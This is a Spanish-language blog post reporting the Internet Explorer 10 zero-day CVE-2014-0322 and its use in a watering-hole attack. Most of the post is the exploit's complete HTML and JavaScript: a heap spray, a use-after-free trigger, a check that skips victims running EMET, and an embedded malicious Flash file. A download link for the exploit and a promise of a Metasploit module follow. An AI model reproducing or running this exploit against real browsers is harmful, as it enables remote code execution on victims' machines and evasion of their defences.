15 feb. 2014

0-Day en Internet Explorer 10 Remote Code Execution (CVE-2014-0322) [Exploit]


Los investigadores de seguridad de FireEye han descubierto un nuevo exploit IE 10 0-Day (CVE-2014-0322), que está siendo utilizado en un ataque de Watering Hole Attack y siendo servida desde el sitio web de U.S. Veterans of Foreign Wars (vfw[.]org), agregando un iFrame.

El objetivo del ataque  se centra en IE 10 con Adobe Flash Player, sobre el cual se coordina el resto del ataque. El fallo de seguridad es un error de uso después de liberación (use-after-free) que da el atacante acceso directo a la memoria en una dirección arbitraria, usando un archivo corrupto de Adobe Flash, siendo capaz de pasar la protección Space Layout Randomization (ASLR) y Data Execution Prevention (DEP).

El exploit cuenta con un *.html un *.swf (archivo corrupto de Adobe Flash) y un *.as3.

 El html contiene:
<html>

<head id="headId">
 <title>main page</title>
 <script>
  function dword2data(dword) {
   var d = Number(dword).toString(16);
   while (d.length < 8)
    d = '0' + d;
   return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
  }

  function developonther(txt) {
   var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
   xmlDoc.async = true;
   xmlDoc.loadXML(txt);
   if (xmlDoc.parseError.errorCode != 0) {
    var err;
    err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
    err += "Error Reason: " + xmlDoc.parseError.reason;
    err += "Error Line: " + xmlDoc.parseError.line;
    if (err.indexOf("-2147023083") > 0) {
     return 1;
    } else {
     return 0;
    }
   }
   return 0;
  }

  var g_arr = [];
  var arrLen = 0x250;

  function fun() {

   var a = 0;
   for (a = 0; a < arrLen; ++a) {
    g_arr[a] = document.createElement('div')
   };
   var b = dword2data(0xdeadc0de);
   var c = 0x1a1b2000;
   while (b.length < 0x360) {
    if (b.length == (0x94 / 2)) {
     b += dword2data(c + 0x10 - 0x0c)
    } else if (
     b.length == (0x98 / 2)) {
     b += dword2data(c + 0x14 - 0x8)
    } else if (b.length == (0xac / 2)) {
     b += dword2data(c - 0x10)
    } else if (b.length == (0x15c / 2)) {
     b += dword2data(0x42424242)
    } else {
     b += dword2data(0x1a1b2000 - 0x10)
    }
   };
   var d = b.substring(0, (0x340 - 2) / 2);
   try {
    this.outerHTML = this.outerHTML
   } catch (e) {}
   CollectGarbage();
   for (a = 0; a < arrLen; ++a) {
    g_arr[a].title = d.substring(0, d.length);
   }
  }

  function puIHa3() {

   var bamboo_go = "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>";

   if (navigator.userAgent.indexOf("MSIE 10.0") > 0) {
    if (developonther(bamboo_go)) {

     return;
    }
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = fun;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
   } else if (navigator.userAgent.indexOf("IE10") > 0) {
    if (developonther(bamboo_go)) {

     return;
    }
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = fun;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
   }
  }
 </script>
 <embed src=Tope.swf width=10 height=10></embed>
</head>

</html>

Apenas salga el módulo para Metasploit lo estaré informando, por ahora es una noticia que está en proceso.

Download Exploit 0-day en Internet Explorer 10 (CVE-2014-0322)


Fuente:

[-] Salu2
[-] Zion3R

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como ingeniero de software en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Black Hat (5) BlackHat (1) Blackploit (25) Brute Force (3) Bug (105) Bypass Password (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (9) Cryptsetup (1) DDoS (11) DEF CON (3) DEFCON (6) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) GhostShell (1) GNU/Linux (4) Google (1) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (5) Hacking (17) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (4) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (192) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (9) PDF (6) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (9) PRISM (1) Privacidad (1) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (4) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (143) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (73) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (47) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (15)

 
biz.